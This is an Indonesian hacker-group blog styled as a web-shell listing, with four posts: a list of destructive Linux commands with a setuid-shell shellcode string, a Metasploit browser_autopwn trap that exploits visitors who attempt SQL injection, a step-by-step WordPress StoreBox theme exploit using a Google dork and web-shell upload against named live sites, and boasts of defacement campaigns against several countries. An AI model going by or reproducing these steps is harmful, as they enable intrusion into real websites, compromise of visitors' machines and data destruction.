b374k
v10
today : | at : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

Beberapa command berbahaya di Linux Indonesian Security Down rwxr-xr-x 0 05.28

Filename Beberapa command berbahaya di Linux
Permission rw-r--r--
Author Indonesian Security Down
Date and Time 05.28
Label
Action
Habis dari IRC-Chat dapat pencerahan dari sobat - sobat disana..
Katanya untuk pengguna baru linux mesti hati-hati terhadap orang yg diajak chat lewat IRC atau Chat Forum lainnya, karena ada beberapa orang disana yg niatnya jahat mau kibulin orang  

biasalah klw pemula kan hobinya nanya sana-sini untuk mencari sesuap ilmu seperti ane  
Nah kali ini ane akan berbagi beberapa command yg bisa dibilang berbahaya 

Code:
root@linux:~# rm -rf /
* Perintah diatas akan menghapus secara paksa semua file yang berada dlam direktori root.

Code:
root@linux:~# char esp[] _attribute_ ((section(“.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
* Ini adalah versi hex dari [rm-rf /] yang bisa menipu anda 

Code:
root@linux:~# mkfs.ext3 /dev/sda1
* Perintah ini akan memformat atau menghapus semua file dari device yg disebutkan("/dev/sda1") setelah perintah mkfs.

Code:
root@linux:~# :(){:|:&};:
* Dikenal sebagai bom garpu, perintah ini akan membuat sistem anda sibuk sendiri sampai sistem anda membeku alias Hang, dengan kata lain anda men-DOS diri anda sendiri.

Code:
root@linux:~# any_command > /dev/sda
* With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data. translate sendiri 

Code:
root@linux:~# wget http://some_untrusted_source O | sh
* Jangan pernah mendownload dari sumber tidak terpercaya, bisa saja itu adalah malicious code.

Code:
root@linux:~# mv ~/* /dev/null atau mv /home/yourhomedirectory/* /dev/null
* /dev/null merupakan lokasi khusus - memindahkan file/direktori ke /dev/null sama saja menghapusnya.

Code:
root@linux:~# if=/dev/urandom of=/dev/sda
* This command fill your hard disk partition with some random data

Code:
root@linux:~#  yes > /dev/sda
* This command fill your hard disk with the character ‘y’

Cukup sekian thread cupu dari ane 

Catatan Penting
Jangan mencoba beberapa perintah diatas pada PC atau Notebook Anda
Tolong Jangan mengerjain teman anda dengan perintah di atas 

 sumber : Indonesian BackTrack Team

menangkal serangan sqli dengan metasploit Indonesian Security Down rwxr-xr-x 0 02.44

Filename menangkal serangan sqli dengan metasploit
Permission rw-r--r--
Author Indonesian Security Down
Date and Time 02.44
Label
Action

Hallo semua... kali ini saya ingin sharing , cara menangkal serangan sqli pada sebuah web,, menggunakan metasploit,,,, 
Kebanyakan para attacker itu menggunakan windows,,,, 
nah ini merupakan kesempatan bagi kita untuk melakukan serangan balik... 

 langsung aja nh ,,, maaf klo repost....
buat script index.php
Code:
<?php
if (isset($_GET['xnod']) && preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $_GET['xnod'])) 
{
header('Location: http://192.168.1.100:4444');
}
?>
<html>
<body>
Silahkan dicoba
<a href="?xnod=2">test 1</a> - <a href="?xnod=2">test 2</a>- <a href="?xnod=6">test 3</a>
</body>
</html>

 sipp sekrang buat script biar lebih mudah gunain metasploit
kasih nama antisqli.rc

 Code:
# cat <<EOF> antisqli.rc
> use auxiliary/server/browser_autopwn
> set LHOST 192.168.100
> set SRVPORT 4444
> set URIPATH /
> run
> EOF

 Nah sekarang kita jalanin metasploit sambil nunggu si attacker menyerang,,, sambil ngopi2 + makan gorengan..

 ./msfconsole -q -r antisqli.rc 

 silahkan tunggu smpe ada log seperti ini
Code:
192.168.1.5:1205 [302]: /?xnod=6%27
lama menunggu akhirnya ada jga yg kena nh..

 Code:
msf  auxiliary(browser_autopwn) >
[*] 192.168.1.5    browser_autopwn - Handling '/'
[*] 192.168.1.5     browser_autopwn - Handling '/?sessid=TWljcm9zb2Z0IFdpbmRvd3M6Nzp1bmRlZmluZWQ6ZW4tVVM6eDg2OkZpcmVmb3g6MTIuMDo%​3d'
[*] 192.168.1.5     browser_autopwn - JavaScript Report: Microsoft Windows:7:undefined:en-US:x86:Firefox:12.0:
[*] 192.168.1.5    browser_autopwn - Responding with 18 exploits
nah tunggu smpe masuk meterpreter,,, dan selanjutnya terserah anda,,,,, wkwkkwk

 Regards : ISD_andreas

Exploit Theme Webshop Wordpress Indonesian Security Down rwxr-xr-x 0 00.48

Filename Exploit Theme Webshop Wordpress
Permission rw-r--r--
Author Indonesian Security Down
Date and Time 00.48
Label
Action

Neh poc buat theme webshop wordpress yang memakai theme storebox

Caranya sama seperti yang sudah di buat oleh Penjaga Mesjid cuma dork yang dia bagi sudah banyak yang ngambil :)

Neh dork baru, jadi insya Allah situsnya masih banyak kok

Step-stepnya seperti ini

Kita pakai dork

"StoreBox by" intext:dress

Disini intext:dress bisa diganti dengan yang lain, yang jelas ada hubunganannya dengan jual beli, soalnya kan targetnya webshop, misalnya intext:badge, intext:baju, jadi tergantung kreasi kamu saja :)

Kemudian kita pilih salah satu situs..

Scnya : http://i.imgur.com/WOvoQWS.png

Lihatkan dibagian footernya ada kata "StoreBox by", ini adalah kata yang dicrawl oleh google, dan semua situs yang ada kata ""StoreBox by" akan terbaca di index Google.

Setelah itu kita lihat sourcenya, saya pake chrome jadi kita tekan ctrl+u

Scnya : http://i.imgur.com/zkYBltG.png

Terlihat di source bagian "wp-content/themes" ada 2 bagian:

1. http://webdesignsexpress.com/storebox/wp-content/themes/framework/library/js/jquery-1.3.2.min.js

2. http://webdesignsexpress.com/storebox/wp-content/themes/StoreBox_child/style.css

Nah disini kita ambil yang ke-1

http://webdesignsexpress.com/storebox/wp-content/themes/framework/library/js/jquery-1.3.2.min.js

*Terkadang ada situs yang memiliki link seperti dibawah ini:
"wp-content/themes/StoreBox_child/framework"

Tinggalkan saja, karena kemungkinan ini tidak bisa :(
Lanjut..

Setelah itu kita klik link yang ke-1 dan terbuka halaman baru menuju linknya..

Terus kita ubah link yang ke-1

http://webdesignsexpress.com/storebox/wp-content/themes/framework/library/js/jquery-1.3.2.min.js

menjadi

http://webdesignsexpress.com/storebox/wp-content/themes/framework/upload

Sehingga akan muncul form upload

Scnya : http://i.imgur.com/5Jfvte2.png

kamu browse shell dan setelah itu akan muncul loading baru, tunggu hingga loading bar itu selesai, kalau tidak selesai-selesai, berarti situs itu tidak fresh lagi..Kalau loading barnya berhenti, berarti shell sudah terupload.

Shell akan berada pada lokasi
http://webdesignsexpress.com/storebox/wp-content/uploads/products_img/

Sc : http://i.imgur.com/ZPbpEsx.png

Eksekusi shell kamu, yang diatas saya menggunakan weevely

Sc : http://i.imgur.com/oCXkgV9.png

Jadi kalau lewat terminal maka akan seperti ini

Sc : http://i.imgur.com/6FhIqRO.png

Kalau ada masalah atau apa, tinggal komen aja bro :)

Makasih

#newbiei cuma pengen berbagi..

Catatan Kecil

1. Kreasi itu sangat penting dalam menemukan celah.

2. Walaupun dengan menggunakan dork lama, tapi kalau kamu kreasikan, pasti akan menemukan target baru.

aktifitas Indonesian Security Down Team Indonesian Security Down rwxr-xr-x 6 11.44

Filename aktifitas Indonesian Security Down Team
Permission rw-r--r--
Author Indonesian Security Down
Date and Time 11.44
Label
Action

sebulan sejak berdirinya Indonesian Security Down 3 bulan lalu .,  indonesia security down yang mempunyai misi bergerak pada operation tertentu .  diantaranya :


#Op Fvcklentine Day's
#Op Myanmar
#Op India
#Op Israel
#Op USA

kami bangga akan itu karena atas jalan allah , dan atas kerja sama dari semua pihak ... walaupun tidak dikatakan maksimal . berikut beberapa Operation yang di abadikan oleh indonesian dan luar . 

- #Op Fvcklentine Day
https://www.google.com/searchq=ottawa+school+hacked&aq=f&oq=ottawa+sc&aqs=chrome.0.59j57j0l2j60.2094&sourceid=chrome&ie=UTF-8 - 

#Op Myanmar ,* Kaskus - 

#Op India
http://www.michael-takeuchi.com/2013/02/indonesia-hacker-op-india.html 

http://cup3zst.heck.in/hacker-indonesia-vs-hacker-india.xhtml 

http://www.kaskus.co.id/post/51237f941dd719af0e000016 - 

-#Op IsraHell

http://muslimdaily.net/berita/teknologi/hacker-indonesia-retas-3-situs-israel-sekaligus.html#.UW7YeEr4YYo

http://thehackernews.com/2013/04/anonymous-hackers-launch-massive-cyber.html

https://www.youtube.com/watch?v=6Ab-NCMNiNo&feature=player_embedded

http://rt.com/op-edge/anonymous-attacks-vs-cyber-terrorism-464/

http://www.youtube.com/watch?v=Uxy57ofajwE


#Op USA
https://traxarmstrong.com/opusa-was-carried-out-with-minimal-impact-amidst-a-
disclaimer-by-anonymous/#gsc.tab=0

http://www.leakedin.com/2013/05/07/potential-leak-of-data-hacking-notification-1938/

http://www.hackersnewsbulletin.com/2013/05/list-of-websites-affected-under-opusa.html

http://www.wapcyber4rt.com/2013/05/indonesian-security-down-team-hacked.html

semoga setiap operation kami akan di ridhoi oleh yang maha esa . !!
Langganan: Postingan (Atom)
 

Jayalah Indonesiaku © 2010 Indonesian Security Down Team
Template design by Indonesian Security Down